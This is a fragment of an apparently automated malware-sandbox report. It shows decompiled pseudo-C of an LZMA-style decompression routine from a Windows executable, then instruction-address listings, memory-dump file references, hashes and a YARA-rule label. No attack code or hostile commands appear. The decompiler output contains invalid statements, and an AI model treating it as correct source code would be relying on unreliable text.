								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































              0x00406abc
              0x00406ac3
              0x00406ac9
              0x00406acf
              0x00000000
              0x00406ad3
              0x00406adf
              0x00406adf
              0x00406adf
              0x00406ae8
              0x00000000
              0x00000000
              0x00406aee
              0x00000000
              0x00406af5
              0x00406af9
              0x00000000
              0x00000000
              0x00406b02
              0x00406b05
              0x00406b08
              0x00406b0a
              0x00406b0c
              0x00000000
              0x00000000
              0x00406b12
              0x00406b15
              0x00406b17
              0x00406b18
              0x00406b1b
              0x00406b1d
              0x00406b1e
              0x00406b20
              0x00406b23
              0x00406b28
              0x00406b2d
              0x00406b36
              0x00406b49
              0x00406b4c
              0x00406b55
              0x00406b58
              0x00406b80
              0x00406b80
              0x00406b82
              0x00406b90
              0x00406b90
              0x00406b94
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406b84
              0x00406b84
              0x00406b87
              0x00406b87
              0x00406b88
              0x00406b88
              0x00000000
              0x00406b84
              0x00406b5a
              0x00406b5e
              0x00406b63
              0x00406b63
              0x00406b6c
              0x00406b72
              0x00406b74
              0x00406b77
              0x00000000
              0x00406b7d
              0x00406b7d
              0x00000000
              0x00406b7d
              0x00000000
              0x00406b9a
              0x00406b9a
              0x00406b9e
              0x0040744a
              0x00000000
              0x0040744a
              0x00406ba7
              0x00406bb7
              0x00406bba
              0x00406bbd
              0x00406bbd
              0x00406bbd
              0x00406bc0
              0x00406bc0
              0x00406bc4
              0x00000000
              0x00000000
              0x00406bc6
              0x00406bc9
              0x00406bcc
              0x00406bf6
              0x00406bfc
              0x00406c03
              0x00000000
              0x00406c03
              0x00406bce
              0x00406bd2
              0x00406bd5
              0x00406bda
              0x00406bda
              0x00406be5
              0x00406beb
              0x00406bed
              0x00406bf0
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406c35
              0x00406c3b
              0x00406c3e
              0x00406c4b
              0x00406c53
              0x00000000
              0x00000000
              0x00406c0a
              0x00406c0a
              0x00406c0e
              0x00407459
              0x00000000
              0x00407459
              0x00406c1a
              0x00406c25
              0x00406c25
              0x00406c25
              0x00406c28
              0x00406c2b
              0x00406c2e
              0x00406c31
              0x00406c33
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x004072ca
              0x004072ca
              0x004072d0
              0x004072d6
              0x004072d9
              0x004072dc
              0x004072f6
              0x004072f9
              0x004072ff
              0x0040730a
              0x0040730a
              0x0040730c
              0x004072de
              0x004072de
              0x004072ed
              0x004072f1
              0x004072f1
              0x0040730f
              0x00407316
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00407318
              0x00407318
              0x0040731c
              0x004074cb
              0x00000000
              0x004074cb
              0x00407328
              0x0040732f
              0x00407337
              0x00407337
              0x00407337
              0x0040733a
              0x0040733d
              0x0040733d
              0x00000000
              0x00000000
              0x00406c5b
              0x00406c5d
              0x00406c60
              0x00406cd1
              0x00406cd4
              0x00406cd7
              0x00406cde
              0x00406ce8
              0x00000000
              0x00406ce8
              0x00406c62
              0x00406c66
              0x00406c69
              0x00406c6b
              0x00406c6e
              0x00406c71
              0x00406c73
              0x00406c76
              0x00406c78
              0x00406c7d
              0x00406c80
              0x00406c83
              0x00406c87
              0x00406c8e
              0x00406c91
              0x00406c98
              0x00406c9c
              0x00406ca4
              0x00406ca4
              0x00406ca4
              0x00406c9e
              0x00406c9e
              0x00406c9e
              0x00406c93
              0x00406c93
              0x00406c93
              0x00406ca8
              0x00406cab
              0x00406cc9
              0x00406ccb
              0x00000000
              0x00406ccb
              0x00406cad
              0x00406cb0
              0x00406cb3
              0x00406cb6
              0x00406cb8
              0x00406cb8
              0x00406cb8
              0x00406cbb
              0x00406cbe
              0x00406cc0
              0x00406cc1
              0x00406cc4
              0x00000000
              0x00000000
              0x00406efa
              0x00406efe
              0x00406f1c
              0x00406f1f
              0x00406f26
              0x00406f29
              0x00406f2c
              0x00406f2f
              0x00406f32
              0x00406f35
              0x00406f37
              0x00406f3e
              0x00406f3f
              0x00406f41
              0x00406f44
              0x00406f47
              0x00406f4a
              0x00406f4a
              0x00406f4f
              0x00000000
              0x00406f4f
              0x00406f00
              0x00406f03
              0x00406f06
              0x00406f10
              0x00000000
              0x00000000
              0x00406f64
              0x00406f68
              0x00406f8b
              0x00406f8e
              0x00406f91
              0x00406f9b
              0x00406f6a
              0x00406f6a
              0x00406f6d
              0x00406f70
              0x00406f73
              0x00406f80
              0x00406f83
              0x00406f83
              0x00000000
              0x00000000
              0x00406fa7
              0x00406fab
              0x00000000
              0x00000000
              0x00406fb1
              0x00406fb5
              0x00000000
              0x00000000
              0x00406fbb
              0x00406fbd
              0x00406fc1
              0x00406fc1
              0x00406fc4
              0x00406fc8
              0x00000000
              0x00000000
              0x00407018
              0x0040701c
              0x00407023
              0x00407026
              0x00407029
              0x00407033
              0x00000000
              0x00407033
              0x0040701e
              0x00000000
              0x00000000
              0x0040703f
              0x00407043
              0x0040704a
              0x0040704d
              0x00407050
              0x00407045
              0x00407045
              0x00407045
              0x00407053
              0x00407056
              0x00407059
              0x00407059
              0x0040705c
              0x0040705f
              0x00407062
              0x00407062
              0x00407065
              0x0040706c
              0x00407071
              0x00000000
              0x00000000
              0x004070ff
              0x004070ff
              0x00407103
              0x004074a1
              0x00000000
              0x004074a1
              0x00407109
              0x0040710c
              0x0040710f
              0x00407113
              0x00407116
              0x0040711c
              0x0040711e
              0x0040711e
              0x0040711e
              0x00407121
              0x00407124
              0x00000000
              0x00000000
              0x00406cf4
              0x00406cf4
              0x00406cf8
              0x00407465
              0x00000000
              0x00407465
              0x00406cfe
              0x00406d01
              0x00406d04
              0x00406d08
              0x00406d0b
              0x00406d11
              0x00406d13
              0x00406d13
              0x00406d13
              0x00406d16
              0x00406d19
              0x00406d19
              0x00406d1c
              0x00406d1f
              0x00000000
              0x00000000
              0x00406d25
              0x00406d2b
              0x00000000
              0x00000000
              0x00406d31
              0x00406d31
              0x00406d35
              0x00406d38
              0x00406d3b
              0x00406d3e
              0x00406d41
              0x00406d42
              0x00406d45
              0x00406d47
              0x00406d4d
              0x00406d50
              0x00406d53
              0x00406d56
              0x00406d59
              0x00406d5c
              0x00406d5f
              0x00406d7b
              0x00406d7e
              0x00406d81
              0x00406d84
              0x00406d8b
              0x00406d8f
              0x00406d91
              0x00406d95
              0x00406d61
              0x00406d61
              0x00406d65
              0x00406d6d
              0x00406d72
              0x00406d74
              0x00406d76
              0x00406d76
              0x00406d98
              0x00406d9f
              0x00406da2
              0x00000000
              0x00406da8
              0x00000000
              0x00406da8
              0x00000000
              0x00406dad
              0x00406dad
              0x00406db1
              0x00407471
              0x00000000
              0x00407471
              0x00406db7
              0x00406dba
              0x00406dbd
              0x00406dc1
              0x00406dc4
              0x00406dca
              0x00406dcc
              0x00406dcc
              0x00406dcc
              0x00406dcf
              0x00406dd2
              0x00406dd2
              0x00406dd2
              0x00406dd8
              0x00000000
              0x00000000
              0x00406dda
              0x00406ddd
              0x00406de0
              0x00406de3
              0x00406de6
              0x00406de9
              0x00406dec
              0x00406def
              0x00406df2
              0x00406df5
              0x00406df8
              0x00406e10
              0x00406e13
              0x00406e16
              0x00406e19
              0x00406e19
              0x00406e1c
              0x00406e20
              0x00406e22
              0x00406dfa
              0x00406dfa
              0x00406e02
              0x00406e07
              0x00406e09
              0x00406e0b
              0x00406e0b
              0x00406e25
              0x00406e2c
              0x00406e2f
              0x00000000
              0x00406e31
              0x00000000
              0x00406e31
              0x00406e2f
              0x00406e36
              0x00406e36
              0x00406e36
              0x00406e36
              0x00000000
              0x00000000
              0x00406e71
              0x00406e71
              0x00406e75
              0x0040747d
              0x00000000
              0x0040747d
              0x00406e7b
              0x00406e7e
              0x00406e81
              0x00406e85
              0x00406e88
              0x00406e8e
              0x00406e90
              0x00406e90
              0x00406e90
              0x00406e93
              0x00406e96
              0x00406e96
              0x00406e9c
              0x00406e3a
              0x00406e3a
              0x00406e3d
              0x00000000
              0x00406e3d
              0x00406e9e
              0x00406e9e
              0x00406ea1
              0x00406ea4
              0x00406ea7
              0x00406eaa
              0x00406ead
              0x00406eb0
              0x00406eb3
              0x00406eb6
              0x00406eb9
              0x00406ebc
              0x00406ed4
              0x00406ed7
              0x00406eda
              0x00406edd
              0x00406edd
              0x00406ee0
              0x00406ee4
              0x00406ee6
              0x00406ebe
              0x00406ebe
              0x00406ec6
              0x00406ecb
              0x00406ecd
              0x00406ecf
              0x00406ecf
              0x00406ee9
              0x00406ef0
              0x00406ef3
              0x00000000
              0x00406ef5
              0x00000000
              0x00406ef5
              0x00000000
              0x00407182
              0x00407182
              0x00407186
              0x004074ad
              0x00000000
              0x004074ad
              0x0040718c
              0x0040718f
              0x00407192
              0x00407196
              0x00407199
              0x0040719f
              0x004071a1
              0x004071a1
              0x004071a1
              0x004071a4
              0x00000000
              0x00000000
              0x00406f52
              0x00406f52
              0x00406f55
              0x00000000
              0x00000000
              0x00407291
              0x00407295
              0x004072b7
              0x004072ba
              0x004072c4
              0x004072c7
              0x004072c7
              0x00000000
              0x004072c7
              0x00407297
              0x0040729a
              0x0040729e
              0x004072a1
              0x004072a1
              0x004072a4
              0x00000000
              0x00000000
              0x0040734e
              0x00407352
              0x00407370
              0x00407370
              0x00407370
              0x00407377
              0x0040737e
              0x00407385
              0x00407385
              0x00000000
              0x00407385
              0x00407354
              0x00407357
              0x0040735a
              0x0040735d
              0x00407364
              0x004072a8
              0x004072a8
              0x004072ab
              0x00000000
              0x00000000
              0x0040743f
              0x00407442
              0x00000000
              0x00000000
              0x00407079
              0x0040707b
              0x00407082
              0x00407083
              0x00407085
              0x00407088
              0x00000000
              0x00000000
              0x00407090
              0x00407093
              0x00407096
              0x00407098
              0x0040709a
              0x0040709a
              0x0040709b
              0x0040709e
              0x004070a5
              0x004070a8
              0x004070b6
              0x00000000
              0x00000000
              0x0040738c
              0x0040738c
              0x0040738f
              0x00407396
              0x00000000
              0x00000000
              0x0040739b
              0x0040739b
              0x0040739f
              0x004074d7
              0x00000000
              0x004074d7
              0x004073a5
              0x004073a8
              0x004073ab
              0x004073af
              0x004073b2
              0x004073b8
              0x004073ba
              0x004073ba
              0x004073ba
              0x004073bd
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c3
              0x004073c3
              0x004073c7
              0x00407427
              0x0040742a
              0x0040742f
              0x00407430
              0x00407432
              0x00407434
              0x00407437
              0x00407343
              0x00407343
              0x00000000
              0x00407343
              0x004073c9
              0x004073cf
              0x004073d2
              0x004073d5
              0x004073d8
              0x004073db
              0x004073de
              0x004073e1
              0x004073e4
              0x004073e7
              0x004073ea
              0x00407403
              0x00407406
              0x00407409
              0x0040740c
              0x00407410
              0x00407412
              0x00407412
              0x00407413
              0x00407416
              0x004073ec
              0x004073ec
              0x004073f4
              0x004073f9
              0x004073fb
              0x004073fe
              0x004073fe
              0x00407419
              0x00407420
              0x00000000
              0x00407422
              0x00000000
              0x00407422
              0x00000000
              0x004070be
              0x004070c1
              0x004070f7
              0x00407227
              0x00407227
              0x00407227
              0x00407227
              0x0040722a
              0x0040722a
              0x0040722d
              0x0040722f
              0x004074b9
              0x00000000
              0x004074b9
              0x00407235
              0x00407238
              0x00000000
              0x00000000
              0x0040723e
              0x00407242
              0x00407245
              0x00407245
              0x00407245
              0x00000000
              0x00407245
              0x004070c3
              0x004070c5
              0x004070c7
              0x004070c9
              0x004070cc
              0x004070cd
              0x004070cf
              0x004070d1
              0x004070d4
              0x004070d7
              0x004070ed
              0x004070f2
              0x0040712a
              0x0040712a
              0x0040712e
              0x0040715a
              0x0040715c
              0x00407163
              0x00407166
              0x00407169
              0x00407169
              0x0040716e
              0x0040716e
              0x00407170
              0x00407173
              0x0040717a
              0x0040717d
              0x004071aa
              0x004071aa
              0x004071ad
              0x004071b0
              0x00407224
              0x00407224
              0x00407224
              0x00000000
              0x00407224
              0x004071b2
              0x004071b8
              0x004071bb
              0x004071be
              0x004071c1
              0x004071c4
              0x004071c7
              0x004071ca
              0x004071cd
              0x004071d0
              0x004071d3
              0x004071ec
              0x004071ee
              0x004071f1
              0x004071f2
              0x004071f5
              0x004071f7
              0x004071fa
              0x004071fc
              0x004071fe
              0x00407201
              0x00407203
              0x00407206
              0x0040720a
              0x0040720c
              0x0040720c
              0x0040720d
              0x00407210
              0x00407213
              0x004071d5
              0x004071d5
              0x004071dd
              0x004071e2
              0x004071e4
              0x004071e7
              0x004071e7
              0x00407216
              0x0040721d
              0x004071a7
              0x004071a7
              0x004071a7
              0x004071a7
              0x00000000
              0x0040721f
              0x00000000
              0x0040721f
              0x0040721d
              0x00407130
              0x00407133
              0x00407135
              0x00407138
              0x0040713b
              0x0040713e
              0x00407140
              0x00407143
              0x00407146
              0x00407146
              0x00407149
              0x00407149
              0x0040714c
              0x00407153
              0x00407127
              0x00407127
              0x00407127
              0x00407127
              0x00000000
              0x00407155
              0x00000000
              0x00407155
              0x00407153
              0x004070d9
              0x004070dc
              0x004070de
              0x004070e1
              0x00000000
              0x00000000
              0x00406e40
              0x00406e40
              0x00406e44
              0x00407489
              0x00000000
              0x00407489
              0x00406e4a
              0x00406e4d
              0x00406e50
              0x00406e53
              0x00406e56
              0x00406e59
              0x00406e5c
              0x00406e5e
              0x00406e61
              0x00406e64
              0x00406e67
              0x00406e69
              0x00406e69
              0x00406e69
              0x00000000
              0x00000000
              0x00406fcb
              0x00406fcb
              0x00406fcf
              0x00407495
              0x00000000
              0x00407495
              0x00406fd5
              0x00406fd8
              0x00406fdb
              0x00406fde
              0x00406fe0
              0x00406fe0
              0x00406fe0
              0x00406fe3
              0x00406fe6
              0x00406fe9
              0x00406fec
              0x00406fef
              0x00406ff2
              0x00406ff3
              0x00406ff5
              0x00406ff5
              0x00406ff5
              0x00406ff8
              0x00406ffb
              0x00406ffe
              0x00407001
              0x00407001
              0x00407001
              0x00407004
              0x00407006
              0x00407006
              0x00000000
              0x00000000
              0x00407248
              0x00407248
              0x00407248
              0x0040724c
              0x00000000
              0x00000000
              0x00407252
              0x00407255
              0x00407258
              0x0040725b
              0x0040725d
              0x0040725d
              0x0040725d
              0x00407260
              0x00407263
              0x00407266
              0x00407269
              0x0040726c
              0x0040726f
              0x00407270
              0x00407272
              0x00407272
              0x00407272
              0x00407275
              0x00407278
              0x0040727b
              0x0040727e
              0x00407281
              0x00407285
              0x00407287
              0x0040728a
              0x00000000
              0x0040728c
              0x00407009
              0x00407009
              0x00000000
              0x00407009
              0x0040728a
              0x004074bf
              0x004074e1
              0x004074e7
              0x004074e9
              0x004074f0
              0x00000000
              0x00000000
              0x00406aee
              0x004074f6
              0x004074f6
              0x00000000

              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d02973cee569c5a87d0209c7eb585da92a748f7851f7d1800b7639c908389217
              • Instruction ID: 835433ef786a7bbaa66b5d31b28c9fa354c7a4a33243279710ed11147b04f42a
              • Opcode Fuzzy Hash: d02973cee569c5a87d0209c7eb585da92a748f7851f7d1800b7639c908389217
              • Instruction Fuzzy Hash: F1816871D04228CBDF24CFA8C844BAEBBB0FF44305F11816AD856BB281D7786986DF45
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00406EFA, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
              Download Yara Rule
              C-Code - Quality: 98%
              			E00406EFA() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
